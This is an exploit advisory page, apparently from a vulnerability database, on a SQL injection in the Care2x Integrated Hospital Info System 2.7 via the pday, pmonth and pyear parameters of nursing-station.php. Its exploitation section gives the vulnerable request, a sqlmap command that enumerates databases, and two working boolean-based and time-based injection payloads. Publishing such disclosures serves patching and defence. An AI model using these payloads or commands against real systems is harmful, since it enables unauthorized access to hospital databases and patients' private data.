Care2x Integrated Hospital Info System 2.7 SQL Injection

2021.07.30
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection # Date: 29.07.2021 # Exploit Author: securityforeveryone.com # Vendor Homepage: https://care2x.org # Software Link: https://sourceforge.net/projects/care2002/ # Version: =< 2.7 Alpha # Tested on: Linux/Windows # Researchers : Security For Everyone Team - https://securityforeveryone.com DESCRIPTION In Care2x < 2.7 Alpha, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the "pday", "pmonth", "pyear" parameters. The vulnerability is found in the "pday", "pmonth", "pyear" parameters in GET request sent to page "nursing-station.php". Example: /nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=123123&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern= if an attacker exploits this vulnerability, attacker may access private data in the database system. EXPLOITATION # GET /nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=station&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern= HTTP/1.1 # Host: Target Sqlmap command: sqlmap.py -r request.txt --level 5 --risk 3 -p year --random-agent --dbs Payload1: pyear=2021') RLIKE (SELECT (CASE WHEN (9393=9393) THEN 2021 ELSE 0x28 END)) AND ('LkYl'='LkYl Payload2: pyear=2021') AND (SELECT 4682 FROM (SELECT(SLEEP(5)))wZGc) AND ('dULg'='dULg


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top